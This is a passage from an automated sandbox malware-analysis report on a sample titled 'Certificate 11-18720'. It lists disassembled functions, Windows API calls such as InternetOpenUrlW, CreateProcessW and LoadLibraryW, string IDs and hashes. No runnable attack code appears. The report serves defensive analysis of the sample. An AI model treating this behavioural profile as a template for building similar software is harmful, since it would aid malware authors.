                                                                                    • Instruction Fuzzy Hash: 72414D71640205EFEB0ACF54C884B9B7BBAEF45315F1480A9ED099F286D7B1DA44CBA0
                                                                                    Function 00605007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00605075
                                                                                    • GetMenuItemInfoW.USER32 ref: 00605091
                                                                                    • DeleteMenu.USER32(00000004,00000007,00000000), ref: 006050D7
                                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00681708,00000000), ref: 00605120
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Delete$InfoItem_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 1173514356-4108050209
                                                                                    • Opcode ID: be5fcc1989c024dd23a8f7e5ad0f4bee57fc259e90be02dfb886dcfd304c7240
                                                                                    • Instruction ID: 9b6b0b835b85a92fb4a4c29e660d2baa6643e2e9d0abe0b7cd47c3ab4829a9c6
                                                                                    • Opcode Fuzzy Hash: be5fcc1989c024dd23a8f7e5ad0f4bee57fc259e90be02dfb886dcfd304c7240
                                                                                    • Instruction Fuzzy Hash: 1841DE302457019FD7289F24D884B6BBBEAAF85318F044A5EF8A6873C1D730A800CF66
                                                                                    Function 00620567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CharLowerBuffW.USER32(?,?,?,?), ref: 00620587
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharLower
                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                    • API String ID: 2358735015-567219261
                                                                                    • Opcode ID: 531a169856ac6b5a88e0b14f2766934ffc7482c5d5672354c4842e51a9870b92
                                                                                    • Instruction ID: 1e1e69bffddc4619abdb1a13cdc77e19ced27afe3962cb8cdea8877e1a58215d
                                                                                    • Opcode Fuzzy Hash: 531a169856ac6b5a88e0b14f2766934ffc7482c5d5672354c4842e51a9870b92
                                                                                    • Instruction Fuzzy Hash: 4E31D630500516AFDF10EF94D845AEEBBB6FF85314B10862AE425A77D1DB71E905CF40
                                                                                    Function 005FB80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 005FB88E
                                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 005FB8A1
                                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 005FB8D1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 3850602802-1403004172
                                                                                    • Opcode ID: 0e42ab583775d03754e29913aa45fc341a9f60adba7e6cba00e9410735cfc2cd
                                                                                    • Instruction ID: 42bfadb495b5a78ab8c384d0282461c0d1795204f575d871ba75863865ef1607
                                                                                    • Opcode Fuzzy Hash: 0e42ab583775d03754e29913aa45fc341a9f60adba7e6cba00e9410735cfc2cd
                                                                                    • Instruction Fuzzy Hash: 8621D276A00109FEEB14ABA4D88ADBE7F7DBF86390F104129F115A61E1DB684D069760
                                                                                    Function 006143E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00614401
                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00614427
                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00614457
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0061449E
                                                                                      • Part of subcall function 00615052: GetLastError.KERNEL32(?,?,006143CC,00000000,00000000,00000001), ref: 00615067
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                    • String ID:
                                                                                    • API String ID: 1951874230-3916222277
                                                                                    • Opcode ID: a6f1c4e204878058e9a5a4a2fdbfb7348cb0e030894078fd73d01b9a77678f88
                                                                                    • Instruction ID: 4c75a10fa18cd3e1ac47003fc3974abb3e34faaf041e6b7d8bf2415fa22c450c
                                                                                    • Opcode Fuzzy Hash: a6f1c4e204878058e9a5a4a2fdbfb7348cb0e030894078fd73d01b9a77678f88
                                                                                    • Instruction Fuzzy Hash: 612180B5500208BEE7119F94CC85EFFB6EEEB49758F14901AF10597240DE649D4597B0
                                                                                    Function 006290E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005DD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 005DD1BA
                                                                                      • Part of subcall function 005DD17C: GetStockObject.GDI32(00000011), ref: 005DD1CE
                                                                                      • Part of subcall function 005DD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 005DD1D8
                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0062915C
                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00629163
                                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00629178
                                                                                    • DestroyWindow.USER32(?), ref: 00629180
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                    • String ID: SysAnimate32
                                                                                    • API String ID: 4146253029-1011021900
                                                                                    • Opcode ID: 4eb8289394ac32b9b4fe161d69c23adea927ee6e613c9a4d3161b3ced1185381
                                                                                    • Instruction ID: b72904f3b502f6e8d5932da4d3b835b0bd3001d669d78488b8248655828bc19c
                                                                                    • Opcode Fuzzy Hash: 4eb8289394ac32b9b4fe161d69c23adea927ee6e613c9a4d3161b3ced1185381
                                                                                    • Instruction Fuzzy Hash: 6C219271600616BBEF104E65EC89EFA37AEFFD63A4F100619F95492290C731DC62AB70
                                                                                    Function 00609568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00609588
                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006095B9
                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 006095CB
                                                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00609605
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateHandle$FilePipe
                                                                                    • String ID: nul
                                                                                    • API String ID: 4209266947-2873401336
                                                                                    • Opcode ID: c10caa75c7912789d8f9cde1506aaab47cc06edda6588c5456a9c2845da57ea6
                                                                                    • Instruction ID: 4bc9b6a0f206cede08d28a35d72774a5c2a94b290a90f55338e9f9e2d17f3e62
                                                                                    • Opcode Fuzzy Hash: c10caa75c7912789d8f9cde1506aaab47cc06edda6588c5456a9c2845da57ea6
                                                                                    • Instruction Fuzzy Hash: 3E213BB4640205ABEB2A9F26DC05ADB7BABEF45720F204A19F9A1D72D1D770D941CB20
                                                                                    Function 00609634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00609653
                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00609683
                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00609694
                                                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 006096CE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateHandle$FilePipe
                                                                                    • String ID: nul
                                                                                    • API String ID: 4209266947-2873401336
                                                                                    • Opcode ID: eccb57b43edc9382c1f4e6b7c5e0ed72164beb931d3a8ba0c372357955c0a902
                                                                                    • Instruction ID: 3c3710a902a023e48fad0d5da7fb1380f4aa34f431d42aee4501c5d4f64b296d
                                                                                    • Opcode Fuzzy Hash: eccb57b43edc9382c1f4e6b7c5e0ed72164beb931d3a8ba0c372357955c0a902
                                                                                    • Instruction Fuzzy Hash: F521A1716502059BEB289F699C04EDB77EBAF45724F200A18F9A1D33D1D7B19941CB30
                                                                                    Function 0060DAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0060DB0A
                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0060DB5E
                                                                                    • __swprintf.LIBCMT ref: 0060DB77
                                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,0065DC00), ref: 0060DBB5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                                                    • String ID: %lu
                                                                                    • API String ID: 3164766367-685833217
                                                                                    • Opcode ID: 2d5ba6331a4ec2e530bb7826946804ed9497fe73a65691586b34b4254b750a45
                                                                                    • Instruction ID: 949ab1374ae78db01b13f2ec047d6200139d65f7277801e3c38daf3cd4139455
                                                                                    • Opcode Fuzzy Hash: 2d5ba6331a4ec2e530bb7826946804ed9497fe73a65691586b34b4254b750a45
                                                                                    • Instruction Fuzzy Hash: 19219575A00149AFCB14EFA5CD85EAEBBB9FF89704B004069F909D7391DB70EA41CB61
                                                                                    Function 005FC9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005FC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 005FC84A
                                                                                      • Part of subcall function 005FC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 005FC85D
                                                                                      • Part of subcall function 005FC82D: GetCurrentThreadId.KERNEL32 ref: 005FC864
                                                                                      • Part of subcall function 005FC82D: AttachThreadInput.USER32(00000000), ref: 005FC86B
                                                                                    • GetFocus.USER32 ref: 005FCA05
                                                                                      • Part of subcall function 005FC876: GetParent.USER32(?), ref: 005FC884
                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 005FCA4E
                                                                                    • EnumChildWindows.USER32(?,005FCAC4), ref: 005FCA76
                                                                                    • __swprintf.LIBCMT ref: 005FCA90
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                                    • String ID: %s%d
                                                                                    • API String ID: 3187004680-1110647743
                                                                                    • Opcode ID: 5ecdfc4401cfe5f7ff6b77a9df75786bf73632bb5a600c2479b62adbe69818b1
                                                                                    • Instruction ID: b21bf1c2bedf01c0273b3841498b10c7f5762244cdd7b508d416c22b1f7fb41f
                                                                                    • Opcode Fuzzy Hash: 5ecdfc4401cfe5f7ff6b77a9df75786bf73632bb5a600c2479b62adbe69818b1
                                                                                    • Instruction Fuzzy Hash: 8411607560020EAACB11BFA09D89FF93F69BB85714F008076BF09AA182DB749645DB70
                                                                                    Function 005E7A94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __lock.LIBCMT ref: 005E7AD8
                                                                                      • Part of subcall function 005E7CF4: __mtinitlocknum.LIBCMT ref: 005E7D06
                                                                                      • Part of subcall function 005E7CF4: EnterCriticalSection.KERNEL32(00000000,?,005E7ADD,0000000D), ref: 005E7D1F
                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 005E7AE5
                                                                                    • __lock.LIBCMT ref: 005E7AF9
                                                                                    • ___addlocaleref.LIBCMT ref: 005E7B17
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                    • String ID: `d
                                                                                    • API String ID: 1687444384-79306151
                                                                                    • Opcode ID: 59c7ab0dcc15e68bf69ee4844a026e01685ba51f3e0352b22a09dbb0826f2cdd
                                                                                    • Instruction ID: 1383eb0b277a79081ae95d35f3ec17ed974b69ab7c33eb5307cc51d7eec6ab37
                                                                                    • Opcode Fuzzy Hash: 59c7ab0dcc15e68bf69ee4844a026e01685ba51f3e0352b22a09dbb0826f2cdd
                                                                                    • Instruction Fuzzy Hash: 19015B71404B45EED7259F76C90974ABBE4FF94321F20890EA4DA966A0DBB0A680CB01
                                                                                    Function 0062E32E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0062E33D
                                                                                    • _memset.LIBCMT ref: 0062E34C
                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00683D00,00683D44), ref: 0062E37B
                                                                                    • CloseHandle.KERNEL32 ref: 0062E38D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memset$CloseCreateHandleProcess
                                                                                    • String ID: D=h
                                                                                    • API String ID: 3277943733-2706595290
                                                                                    • Opcode ID: bdfa37e9ac33eb443cfab5b1bcd56ccbe6601fed7a463b9dfd51adc43f4f927e
                                                                                    • Instruction ID: d30a4b8bf0863124dc1d266510deed717c16bae4f07f15901e0d6d5ce16fec9c
                                                                                    • Opcode Fuzzy Hash: bdfa37e9ac33eb443cfab5b1bcd56ccbe6601fed7a463b9dfd51adc43f4f927e
                                                                                    • Instruction Fuzzy Hash: 43F05EF1540324BAE3106BA1AC49F777E5EEF05F54F005521FE48D62A2D7B59E0087A8
                                                                                    Function 00621945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 006219F3
                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00621A26
                                                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00621B49
                                                                                    • CloseHandle.KERNEL32(?), ref: 00621BBF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                    • String ID:
                                                                                    • API String ID: 2364364464-0
                                                                                    • Opcode ID: 1909ed8a22aff391105aa1f3c3ec81cb714cda238acd4cddeb3e49172a57c9f4
                                                                                    • Instruction ID: 690aa1dc15d7fee2df039aeda0713b972e1f2ba12b7afcb44de7df5ed075e4a1
                                                                                    • Opcode Fuzzy Hash: 1909ed8a22aff391105aa1f3c3ec81cb714cda238acd4cddeb3e49172a57c9f4
                                                                                    • Instruction Fuzzy Hash: E4819674600215ABDF209F54C88ABADBBF6BF55710F04845AF905AF3D2D7B4AD418F90
                                                                                    Function 00601C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(?), ref: 00601CB4
                                                                                    • VariantClear.OLEAUT32(00000013), ref: 00601D26
                                                                                    • VariantClear.OLEAUT32(00000000), ref: 00601D81
                                                                                    • VariantClear.OLEAUT32(?), ref: 00601DF8
                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00601E26
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$Clear$ChangeInitType
                                                                                    • String ID:
                                                                                    • API String ID: 4136290138-0
                                                                                    • Opcode ID: 9e65d094efb9f23ea45c38a1b2992f859a6640ece074b7097b86ca193c4d716a
                                                                                    • Instruction ID: 95536cfd8f345e1bc44fa11d997e64c1c72c1637889cd295e93a38d8a62a6329
                                                                                    • Opcode Fuzzy Hash: 9e65d094efb9f23ea45c38a1b2992f859a6640ece074b7097b86ca193c4d716a
                                                                                    • Instruction Fuzzy Hash: D15149B5A00209EFDB14CF58C884AAAB7F9FF4D314B158559E959DB340E730EA51CBA0
                                                                                    Function 00620688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005C936C: __swprintf.LIBCMT ref: 005C93AB
                                                                                      • Part of subcall function 005C936C: __itow.LIBCMT ref: 005C93DF
                                                                                    • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 006206EE
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0062077D
                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0062079B
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 006207E1
                                                                                    • FreeLibrary.KERNEL32(00000000,00000004), ref: 006207FB
                                                                                      • Part of subcall function 005DE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0060A574,?,?,00000000,00000008), ref: 005DE675
                                                                                      • Part of subcall function 005DE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0060A574,?,?,00000000,00000008), ref: 005DE699
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 327935632-0
                                                                                    • Opcode ID: 044ae81484e06f213167f7f26a47d0c4fa6520447f31d0e9b525c3171f274f7e
                                                                                    • Instruction ID: 0985c0ecb6f610b9d12845f22891c71c7faba266954f850296fb6ca5a75d8e5f
